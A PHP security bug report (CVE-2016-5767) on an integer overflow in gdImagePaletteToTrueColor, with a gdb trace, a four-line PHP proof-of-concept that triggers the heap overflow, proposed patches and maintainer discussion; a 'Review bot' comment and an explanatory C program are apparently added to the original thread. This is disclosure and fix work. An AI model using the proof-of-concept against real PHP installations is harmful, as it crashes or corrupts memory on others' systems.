Sec Bug #72446 Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
Submitted: 2016-06-18 15:55 UTC Modified: 2016-06-23 12:33 UTC
From: gogil at stealien dot com Assigned: pajoye (profile)
Status: Closed Package: GD related
PHP Version: 5.5.36 OS: Ubuntu i386
Private report: No CVE-ID: 2016-5767
 [2016-06-18 15:55 UTC] gogil at stealien dot com
Description:
------------
gdImagePaletteToTrueColor() is prone to an integer overflow, which results in a heap-based overflow.

Tested on 32-bits.


/php$ gdb --args php-5.6.22/sapi/cli/php poc.php
Reading symbols from php-5.6.22/sapi/cli/php...done.
(gdb) b libgd/gd.c:3035
Breakpoint 1 at 0x823a806: file /php/php-5.6.22/ext/gd/libgd/gd.c, line 3035.
(gdb) r
Starting program: /php/php-5.6.22/sapi/cli/php poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, gdImagePaletteToTrueColor (src=0xb4f96d34)
    at /php/php-5.6.22/ext/gd/libgd/gd.c:3035
3035		const unsigned int sx = gdImageSX(src);
(gdb) n
3037		src->tpixels = (int **) gdMalloc(sizeof(int *) * sy);
(gdb) p/x sx
$1 = 0x40000000    <---------- 'sx' is 0x40000000.

(gdb) n
...
3047		src->tpixels[y] = (int *) gdMalloc(sx * sizeof(int));  <---------- sizeof(int) is 0x4.
<---------- gdMalloc will allocate memory with size 0. (LP32/LP64 only)

...
3052		dst_row = src->tpixels[y];
(gdb) n
3053		for (x = 0; x < sx; x++) {
...
3058				*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);
(gdb) x/x dst_row+x
0xb4f96160:	0x2d9c25e0
(gdb) n
3053		for (x = 0; x < sx; x++) {
(gdb) x/x dst_row+x
0xb4f96160:	0x61616161    <---------- It cause heap overflow


(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0823a974 in gdImagePaletteToTrueColor (src=0xb4f96d34)
    at /php/php-5.6.22/ext/gd/libgd/gd.c:3058
3058				*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);




* Fix
File libgd/gd.c, line 123:
gdImagePtr gdImageCreate (int sx, int sy)
{
	int i;
	gdImagePtr im;

	if (overflow2(sx, sy)) {
		return NULL;
	}

	if (overflow2(sizeof(unsigned char *), sy)) {
		return NULL;
	}

+	if (overflow2(sizeof(int), sx)) {
+		return NULL;
+	}

	im = (gdImage *) gdCalloc(1, sizeof(gdImage));
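Review bot: the added `overflow2(sizeof(int), sx)` check in gdImageCreate guards a multiplication that happens in a different function, namely `gdMalloc(sx * sizeof(int))` in gdImagePaletteToTrueColor (line 3047 in the trace above), while gdImageCreate itself only allocates rows of unsigned chars. Consider validating `sx * sizeof(int)` directly in gdImagePaletteToTrueColor, just before that gdMalloc, so the conversion stays safe for any palette image regardless of which constructor produced it, and add a one-line comment next to this check explaining why the palette constructor reasons about sizeof(int); without it a later reader may remove the check as unrelated to the function.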



Test script:
---------------
<?php
// poc.php
ini_set('memory_limit', -1);
$im = imagecreate(0x40000000, 1);
imagecolorallocatealpha($im, 0x61, 0x61, 0x61, 0x61);

imagepalettetotruecolor($im);
?>
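As an added illustration, not code from the bug report, from libgd or from PHP, the following C program models the arithmetic the report describes: the 32-bit wrap of `sx * sizeof(int)` for the PoC width 0x40000000, the two checks gdImageCreate already made, and the extra `sizeof(int) * sx` check from the proposed fix. `overflow2_check` is my own reimplementation of what libgd's `overflow2(a, b)` is assumed to do (reject non-positive operands and any product above INT_MAX); the function names and the guarded row allocator are hypothetical.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Added example, not libgd/PHP code.  overflow2_check() mirrors the
 * assumed semantics of libgd's overflow2(a, b): return 1 when a or b is
 * non-positive or when a * b would exceed INT_MAX, i.e. when the product
 * cannot safely be used as an allocation size. */
int overflow2_check(int a, int b)
{
    if (a <= 0 || b <= 0) {
        return 1;
    }
    if (a > INT_MAX / b) {
        return 1;
    }
    return 0;
}

/* The multiplication from the trace, gdMalloc(sx * sizeof(int)), evaluated
 * in 32-bit unsigned arithmetic as on the reporter's i386 build, where
 * sizeof(int) is 4.  For sx = 0x40000000 the product is 2^32, which wraps
 * to 0, so the allocation "succeeds" with zero usable bytes. */
uint32_t row_bytes_wrapped32(uint32_t sx)
{
    const uint32_t int_size_i386 = 4; /* sizeof(int) on the report's platform */
    return sx * int_size_i386;
}

/* The checks gdImageCreate performed before the fix: width*height and
 * pointer-size*height.  Returns 1 if either check rejects the image.
 * For the PoC (0x40000000 x 1) both pass, which is the bug. */
int pre_fix_checks_reject(int sx, int sy)
{
    return overflow2_check(sx, sy) ||
           overflow2_check((int)sizeof(unsigned char *), sy);
}

/* The additional check from the proposed fix: sizeof(int) * width. */
int fix_check_rejects(int sx)
{
    return overflow2_check((int)sizeof(int), sx);
}

/* Guarded version of the per-row allocation in gdImagePaletteToTrueColor:
 * refuse the multiplication before it can wrap, instead of trusting that
 * the image constructor already validated the width. */
int *alloc_truecolor_row(int sx)
{
    if (overflow2_check((int)sizeof(int), sx)) {
        return NULL;
    }
    return (int *)malloc((size_t)sx * sizeof(int));
}

int main(void)
{
    const int sx = 0x40000000, sy = 1; /* dimensions from poc.php */
    int *row;

    printf("32-bit sx*sizeof(int) = %u\n", row_bytes_wrapped32((uint32_t)sx));
    printf("pre-fix checks reject PoC: %d\n", pre_fix_checks_reject(sx, sy));
    printf("sizeof(int)*sx check rejects PoC: %d\n", fix_check_rejects(sx));

    row = alloc_truecolor_row(sx);
    printf("guarded row allocation for PoC width: %s\n", row ? "allocated" : "refused");
    free(row);

    row = alloc_truecolor_row(640);
    printf("guarded row allocation for width 640: %s\n", row ? "allocated" : "refused");
    free(row);
    return 0;
}
```

Build with `cc -std=c99 -Wall example.c`. On an LP64 build `size_t` is 64 bits, so `sx * sizeof(int)` does not wrap there and instead becomes a 4 GiB request; the guard still refuses it because `overflow2_check` reasons in `int`, which is what libgd stores dimensions in. Substituting `sizeof(unsigned char *)` for `sizeof(int)` in the width check is at least as strict on i386 and LP64, since a pointer is never smaller than an int on those platforms.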


 [2016-06-19 03:54 UTC] stas@php.net
Looks like the issue is in libgd which means it should be reported to libgd maintainers.
 [2016-06-19 04:21 UTC] gogil at stealien dot com
libgd(2.0.34RC~lasted) is not affected by this vulnerability.
php's gdImageCreate() function used a slightly different routine.
 [2016-06-19 05:02 UTC] stas@php.net
-Assigned To: +Assigned To: pajoye
 [2016-06-19 05:02 UTC] stas@php.net
Pierre, could you take a look? Looks like merge is missing or something?
 [2016-06-19 07:43 UTC] pajoye@php.net
It should be:


	if (overflow2(sizeof (unsigned char *), sy)) {
		return NULL;
	}
	if (overflow2(sizeof (unsigned char *), sx)) {
		return NULL;
	}

A palette image uses a 2D array of unsigned chars.

Gogil, Stas, thanks for all the reviews and fixes :) 

@Gogil btw, be sure to check https://github.com/libgd/libgd as it seems you are looking at an old repo with 2.0.34 (bitbucket?) as the latest version.
 [2016-06-19 10:07 UTC] gogil at stealien dot com
libgd(2.0.34RC~latest) is not affected by this vulnerability.

I am sorry for my typo mistake.
 [2016-06-19 14:52 UTC] pajoye@php.net
I got that thanks:)

What I mean is the latest release is 2.2.1 and 2.2.2 should come this week. :)
 [2016-06-19 15:52 UTC] gogil at stealien dot com
I got it.

thanks :)
 [2016-06-21 06:59 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-21 06:59 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-06-21 07:03 UTC] stas@php.net
-PHP Version: Irrelevant +PHP Version: 5.5.36
 [2016-06-21 07:03 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-21 07:26 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-21 07:27 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-22 05:57 UTC] krakjoe@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-23 12:33 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2016-5767
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Sep 17 05:01:27 2024 UTC